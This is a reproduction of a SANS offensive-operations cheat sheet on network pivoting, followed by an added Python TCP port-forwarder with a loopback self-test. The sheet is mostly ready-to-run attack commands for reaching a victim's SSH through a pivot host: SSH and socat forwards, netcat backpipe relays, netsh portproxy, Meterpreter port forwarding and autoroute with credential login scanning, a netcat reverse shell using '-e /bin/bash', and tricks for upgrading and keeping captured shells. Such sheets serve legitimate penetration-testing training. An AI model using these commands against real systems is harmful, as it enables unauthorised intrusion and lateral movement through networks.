SANS Offensive Operations: Pivot Cheat Sheet

Purpose
Navigating a client/victim environment often requires pivoting from target to target, and there are many ways to do so. This cheat sheet runs through various options for different environments and situations. Find a method that fits your situation. In each, we model an attacker pivoting through pivot to reach SSH on victim. Substitute hosts and ports to fit your needs. Pay attention to the prompts: they identify the host where the command should be run AND what type of prompt it is, i.e. Windows cmd.exe (C:\>), PowerShell (PS>), or Linux ($ or #). The diagram in the center should help. Replace terms like victimAdmin and victimPass with appropriate credentials for the given system. On the back, there are some extra goodies like how to upgrade an ugly Netcat shell to something that feels more like a real Bash. Have fun, good luck, and pivot mercilessly!

Scenario
You need to access SSH on port 22 of victim, but you can't go directly due to those meddling firewalls. For simplicity, this sheet generally uses ports 1337, 4000, and 22 on the attacker, pivot, and victim machines:

    attacker.tgt (1337)  -->  pivot.tgt (4000)  -->  victim.tgt (22)

SSH Pivots Require an sshd Setting
Set GatewayPorts yes in sshd_config on the SSH server that will host the forwarded port, then:
    # systemctl restart sshd

SSH flags used below:
    -f        put ssh in the background after connecting
    -N        don't execute a command; just forward some ports
    -p num    use "num" as the port for ssh

SSH Local Port Forward
    attacker $ ssh -fNL 1337:victim.tgt:22 pivotAdmin@pivot.tgt
    attacker $ ssh victimAdmin@localhost -p 1337

SSH Remote Port Forward
    pivot $ ssh -fNR 1337:victim.tgt:22 attacker@attacker.tgt
    attacker $ ssh victimAdmin@localhost -p 1337

SSH Dynamic Port Forward (SOCKS proxy)
    attacker $ ssh -fN -D 9050 pivotAdmin@pivot.tgt
    attacker $ proxychains ssh victimAdmin@victim.tgt
And check /etc/proxychains.conf: its proxy entry must point at the SOCKS port you chose (9050 here, which is also the default in that file).

Netcat Port Forward
    pivot $ cd /tmp && mknod backpipe p
    pivot $ nc -lvp 4000 0<backpipe | nc -v victim.tgt 22 1>backpipe
    attacker $ ssh victimAdmin@pivot.tgt -p 4000

socat Port Forward
    pivot $ socat TCP-LISTEN:4000,fork TCP:victim.tgt:22
    attacker $ ssh victimAdmin@pivot.tgt -p 4000

Windows Port Forward (netsh portproxy; requires an administrator prompt on pivot)
    pivot C:\> netsh interface portproxy add v4tov4 listenport=4000 listenaddress=0.0.0.0 connectport=22 connectaddress=victim.tgt
    attacker $ ssh victimAdmin@pivot.tgt -p 4000

Meterpreter Port Forward
    pivot meterpreter > portfwd add -l 4000 -p 22 -r victim.tgt
    attacker $ ssh victimAdmin@pivot.tgt -p 4000

Meterpreter Autoroute (route Metasploit modules through the session)
    pivot meterpreter > run post/multi/manage/autoroute SUBNET=pivotSubnet CMD=add
    pivot meterpreter > background
    msf > use auxiliary/scanner/ssh/ssh_login
    msf > set RHOSTS victim.tgt
    msf > set USERNAME victimAdmin
    msf > set PASSWORD victimPass
    msf > run

Netcat Reverse Shell to pivot (assumes code execution on victim)
    pivot $ nc -lvp 4000
    victim $ ncat pivot.tgt 4000 -e /bin/bash

SSH Traversal through Linux
    attacker $ ssh pivotAdmin@pivot.tgt
    pivot $ ssh victimAdmin@victim.tgt

PowerShell, RDP or psexec through Windows
    attacker PS> Enter-PSSession -ComputerName pivot.tgt
    RDP session over Windows: mstsc /v:pivot.tgt
    Or run psexec.exe against pivot.tgt.
Now, with command execution on pivot:
    pivot $ ssh victimAdmin@victim.tgt
No SSH available? How about PuTTY?
Note that even if all the hosts in the chain run Windows, you can't typically Enter-PSSession twice because of how credentials are delegated (the "double hop" problem). Run a search for "PSSession double hop" for more info.

Upgrade Ugly Shells
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    $ ruby -e 'exec "/bin/sh"'
    $ perl -e 'exec "/bin/sh"'
    $ /bin/sh -i   or   /bin/bash -i

Further Upgrade Ugly Shells
Things seem off? This sometimes returns functionality like arrow keys and Ctrl-C to the shell:
    Ctrl-Z                  (suspend the raw shell on the attacker side)
    attacker $ stty raw -echo
    attacker $ fg
    $ reset
    $ export SHELL=bash
    $ export TERM=xterm-256color
    $ stty rows 40 columns <cols>      (use the values "stty size" reports in your real terminal)

Keep Sessions Alive
    $ screen -S hacking
Session fails? Regain the session, THEN:
    $ screen -r hacking
Want more functionality than screen? Check out tmux. Is your connection not stable enough for ssh? mosh is more forgiving of spotty connections.

Manage Many SSH Connections
Check out ProxyJump (ssh -J, or the ProxyJump keyword in ssh_config) to manage a wide array of connections through one or more pivots.
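The Netcat, socat, netsh and Meterpreter forwards above all do the same job: accept on pivot:4000 and relay bytes, in both directions, to victim:22. The block below is an added example written for this page, not the SANS sheet's own code: a Python 3 port forwarder for a pivot that has python3 but no socat or nc, behaving like socat TCP-LISTEN:4000,fork TCP:victim.tgt:22. The self_test() function stands up a constructed echo server on loopback as the "victim" and a forwarder as the "pivot"; the loopback addresses, the ephemeral ports and the probe string are all assumptions for the offline test, and on a real pivot you would run it with 0.0.0.0 4000 victim.tgt 22 as arguments.

```python
"""Minimal TCP port forwarder (added example, not from the SANS cheat sheet).

Equivalent to   pivot $ socat TCP-LISTEN:4000,fork TCP:victim.tgt:22
for a pivot that has python3 but no socat/nc.  Real use:
    pivot $ python3 fwd.py 0.0.0.0 4000 victim.tgt 22
self_test() uses constructed loopback addresses and OS-chosen ports only.
"""
import socket
import sys
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees EOF."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, target):
    """Relay one accepted connection to target in both directions."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()          # victim unreachable: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)     # client -> victim in this thread
    back.join()                 # wait for victim -> client to drain
    client.close()
    upstream.close()


def _serve(listen, handler):
    """Bind listen=(host, port), accept in a background thread and run handler per
    connection (the 'fork' in socat's TCP-LISTEN:4000,fork). Returns (sock, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen)
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:     # listener closed
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_forwarder(listen, target):
    """Listen on `listen` and forward every connection to `target`."""
    return _serve(listen, lambda conn: _handle(conn, target))


def start_echo_server(listen=("127.0.0.1", 0)):
    """Constructed stand-in for the victim's sshd: echoes input (port 0 = OS picks)."""
    return _serve(listen, lambda conn: (_pump(conn, conn), conn.close()))


def self_test():
    """attacker -> forwarder ('pivot') -> echo ('victim'); returns what came back."""
    echo, echo_port = start_echo_server()
    fwd, fwd_port = start_forwarder(("127.0.0.1", 0), ("127.0.0.1", echo_port))
    try:
        with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
            c.sendall(b"SSH-2.0-probe\r\n")   # constructed probe, not a real banner
            c.shutdown(socket.SHUT_WR)        # EOF must propagate through the relay
            got = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                got += chunk
    finally:
        fwd.close()
        echo.close()
    return got


if __name__ == "__main__":
    if len(sys.argv) == 5:   # listen_host listen_port target_host target_port
        sock, port = start_forwarder((sys.argv[1], int(sys.argv[2])),
                                     (sys.argv[3], int(sys.argv[4])))
        print("forwarding %s:%d -> %s:%s" % (sys.argv[1], port, sys.argv[3], sys.argv[4]))
        threading.Event().wait()   # run until killed
    else:
        print(self_test())
```

The half-close in _pump is the detail the nc backpipe trick gets wrong and socat gets right: when one side sends EOF, only the write direction is shut down, so data still in flight the other way is delivered before the relay tears down. Like the netsh and socat one-liners, this listens on every interface when given 0.0.0.0, so anyone who can reach pivot:4000 reaches victim:22; bind to 127.0.0.1 and ssh -L into the pivot if that exposure is unwanted.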